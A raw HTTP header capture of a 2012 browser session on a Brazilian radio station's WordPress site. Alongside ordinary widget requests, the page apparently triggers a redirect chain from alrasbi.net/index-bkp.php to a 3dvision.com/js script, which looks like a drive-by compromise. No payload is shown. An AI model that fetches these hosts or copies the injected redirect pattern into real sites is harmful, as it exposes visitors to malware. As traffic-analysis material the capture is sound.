Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 07 Sep 2012 09:17:40 GMT
Etag: &quot;7bf68fe310c3b0bd0ac87d7c9e9d4c94&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Date: Wed, 31 Oct 2012 08:34:55 GMT
Content-Length: 24473
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /wp-content/themes/novo93/style.css HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: text/css
Date: Wed, 31 Oct 2012 08:34:55 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 18 Jun 2012 17:21:41 GMT
Etag: &quot;167607b-52ba-4c2c266347340&quot;
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:55 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4541
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/plugins/wp-bannerize/js/wpBannerizeFrontend.min.js?ver=3.0.50 HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 31 Oct 2012 08:34:55 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 14 Feb 2012 15:00:24 GMT
Etag: &quot;148400b-aa-4b8eddac5d200&quot;
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:55 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 147
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=1.3.17.2 HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 31 Oct 2012 08:34:55 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 14 Feb 2012 17:22:12 GMT
Etag: &quot;148e021-252d-4b8efd5e39900&quot;
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:55 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4149
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /connect/xd_arbiter.php?version=11 HTTP/1.1

Host: static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: cnc3qMBWkgpfEDCb8e+AwK3jfCJ36tAvTGWSz7we1z0=
Content-Length: 9688
Vary: Accept-Encoding
Cache-Control: public, max-age=26132649
Expires: Thu, 29 Aug 2013 19:39:04 GMT
Date: Wed, 31 Oct 2012 08:34:55 GMT
Connection: keep-alive
GET /wp-content/plugins/wp-polls/polls-js.js?ver=2.50 HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 31 Oct 2012 08:34:55 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:30:44 GMT
Etag: &quot;e80bc7-c8e-4b687e2843d00&quot;
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:55 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 644
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET //index-bkp.php?action=jv&h=25187 HTTP/1.1

Host: alrasbi.net
GET //index-bkp.php?action=jv&amp;h=25187 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=afcca3aa8f0f249097810cdca0b44093
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://3dvision.com/js/index.php?setup=d
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13, ASP.NET
Date: Wed, 31 Oct 2012 08:34:53 GMT
Connection: close
Content-Length: 0
GET /connect/xd_arbiter.php?version=11 HTTP/1.1

Host: s-static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: yQhECnWG7FFdFSav+XhnrvdFaxZRNoL7BQs8fkEkfr8=
Content-Length: 9688
Vary: Accept-Encoding
Cache-Control: public, max-age=26132581
Expires: Thu, 29 Aug 2013 19:37:57 GMT
Date: Wed, 31 Oct 2012 08:34:56 GMT
Connection: keep-alive
GET /js/index.php?setup=d HTTP/1.1

Host: 3dvision.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:53:05 GMT
Server: Apache/2.2.15
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=111ne103uprhdbtai4lotl0s55; path=/
Connection: close
Transfer-Encoding: chunked
GET /js/index.php?setup=d&s=2&r=477811 HTTP/1.1

Host: 3dvision.com
GET /js/index.php?setup=d&amp;s=2&amp;r=477811 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=111ne103uprhdbtai4lotl0s55
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:53:06 GMT
Server: Apache/2.2.15
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /j/2/widget.css HTTP/1.1

Host: widgets.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/css
x-amz-id-2: mQvhqcBzmUz8ySebDTUb9NPnB2PgREy+vIPRyMinCRjhGFh/2kTUIgZRY3JCFDEA
x-amz-request-id: 174DA5767733568D
Date: Wed, 31 Oct 2012 08:34:56 GMT
Last-Modified: Wed, 20 Jun 2012 08:18:08 GMT
Etag: &quot;351b7148a7c129829facb18188726f5e&quot;
Accept-Ranges: bytes
Server: AmazonS3
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 928
Cache-Control: private, max-age=900
Age: 0
Expires: Wed, 31 Oct 2012 08:49:56 GMT
X-CDN: Cotendo
Connection: Keep-Alive
GET /j/1/default.gif HTTP/1.1

Host: widgets.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: image/gif
x-amz-id-2: 5VILtIgBbds/vu28zfUaDEwzHtSfLjB1VmzFw6vFbX4EduDum07Zx01cEKgCiFWf
x-amz-request-id: 089C48113FD02F1B
Date: Wed, 31 Oct 2012 08:34:57 GMT
x-amz-meta-s3fox-filesize: 43
x-amz-meta-s3fox-modifiedtime: 1248389237000
Last-Modified: Thu, 23 Jul 2009 22:48:17 GMT
Etag: &quot;df3e567d6f16d040326c7a0ea29a4f41&quot;
Accept-Ranges: bytes
Content-Length: 43
Server: AmazonS3
Cache-Control: private, max-age=900
Age: 0
Expires: Wed, 31 Oct 2012 08:49:57 GMT
Connection: Keep-Alive
GET /i/widget-bird.png HTTP/1.1

Host: widgets.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: image/png
x-amz-id-2: iHGpxPU2z1y73Hgwfbz+5QsjkXEtU5B3gevQU+dPX9Xn/DmGcHjp9kOAGifNxuRE
x-amz-request-id: 5B4499302C3B3328
Date: Wed, 31 Oct 2012 08:34:57 GMT
Last-Modified: Mon, 04 Jun 2012 20:12:29 GMT
Etag: &quot;ec8d8f5c4f9da23d810b574b8c9552a4&quot;
Accept-Ranges: bytes
Content-Length: 1346
Server: AmazonS3
Cache-Control: private, max-age=900
Age: 0
Expires: Wed, 31 Oct 2012 08:49:57 GMT
Connection: Keep-Alive
GET /embed/JG2PtG8fies?fs=1&feature=oembed HTTP/1.1

Host: www.youtube.com
GET /embed/JG2PtG8fies?fs=1&amp;feature=oembed HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: VISITOR_INFO1_LIVE=TIoxcizkAQ0; hideBrowserUpgradeBox=True; PREF=fv=10.0.45&amp;f4=4000
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Wed, 31 Oct 2012 08:34:57 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Transfer-Encoding: chunked
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&send=on&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&width=300&scrolling= HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: Rz+jVioJ01DdpISvLuC8uU/ImVshLlLLbrTYw5JQsTg=
Date: Wed, 31 Oct 2012 08:34:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /rsrc.php/v2/yv/r/LVZxMKo-pXt.css HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 02:23:19 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: HtjMA7CjupM8YgoMnUOH7zmXfoed2Q6ivfLhEVdhV6k=
Content-Length: 2458
Vary: Accept-Encoding
Cache-Control: public, max-age=31466148
Expires: Wed, 30 Oct 2013 13:10:45 GMT
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
GET /rsrc.php/v2/yH/r/Dpn1SKTH3-z.css HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Tue, 25 Sep 2012 01:13:34 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: dMDN7a1IXvLU6yiaN3GjM1lauDCLu8EMov403SVY+c0=
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 499
Cache-Control: public, max-age=28503272
Expires: Thu, 26 Sep 2013 06:09:29 GMT
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
GET /rsrc.php/v2/yV/r/eFN88ZWYIRm.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 01:04:18 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: rf1FnQuyjDT2u4mDWXKaV4B/+oCI2IO3w1/jOM2KChI=
Content-Length: 26585
Vary: Accept-Encoding
Cache-Control: public, max-age=31465942
Expires: Wed, 30 Oct 2013 13:07:19 GMT
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
GET /rsrc.php/v2/y-/r/rYSJ6xqwc9w.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Wed, 26 Sep 2012 22:32:54 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: TjufmLoiMMbquCl0ypMpPByZ6AQIGbia+LLrL+hF72M=
Content-Length: 4242
Vary: Accept-Encoding
Cache-Control: public, max-age=29050810
Expires: Wed, 02 Oct 2013 14:15:07 GMT
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
GET /rsrc.php/v2/yf/r/IiB8QpEDgpn.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 29 Oct 2012 17:08:56 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: 8OGKetH5xlQGSmku2Z/W2vurCpg5XDMMNS8Je0G9JR4=
Content-Length: 19327
Vary: Accept-Encoding
Cache-Control: public, max-age=31398586
Expires: Tue, 29 Oct 2013 18:24:43 GMT
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
GET /index-bkp.php HTTP/1.1

Host: alrasbi.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=afcca3aa8f0f249097810cdca0b44093
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13, ASP.NET
Date: Wed, 31 Oct 2012 08:34:54 GMT
Connection: close
Content-Length: 143
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-4%2F&send=on&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&width=300&scrolling= HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-4%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: ILWCS0PJ+aSsARNIKFX/pI1KaetT1F32WAUIar1Ulho=
Date: Wed, 31 Oct 2012 08:34:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /yts/img/pixel-vfl3z5WfW.gif HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/JG2PtG8fies?fs=1&amp;feature=oembed
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Tue, 16 Oct 2012 23:01:29 GMT
Date: Thu, 25 Oct 2012 07:48:47 GMT
Expires: Fri, 25 Oct 2013 07:48:47 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 521170
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-3%2F&send=on&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&width=300&scrolling= HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-3%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: SAJcQthDqb9pl7/hVn9mA+TwIg7THZUIg9LjFi5rVeE=
Date: Wed, 31 Oct 2012 08:34:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-2%2F&send=on&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&width=300&scrolling= HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-2%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: zCmqPZlUoljgkqi/JJPWz/+K/CzQwqIS3gCJtmCjIx4=
Date: Wed, 31 Oct 2012 08:34:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes%2F&send=on&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&width=300&scrolling= HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: VL21i40z3nami1vWZlFtNTySBLqkLzZAVgS6izpcsTY=
Date: Wed, 31 Oct 2012 08:34:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /yts/cssbin/www-embed-vflkVRvOv.css HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/JG2PtG8fies?fs=1&amp;feature=oembed
HTTP/1.1 200 OK

Content-Type: text/css
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Tue, 23 Oct 2012 16:44:38 GMT
Date: Thu, 25 Oct 2012 07:20:34 GMT
Expires: Fri, 25 Oct 2013 07:20:34 GMT
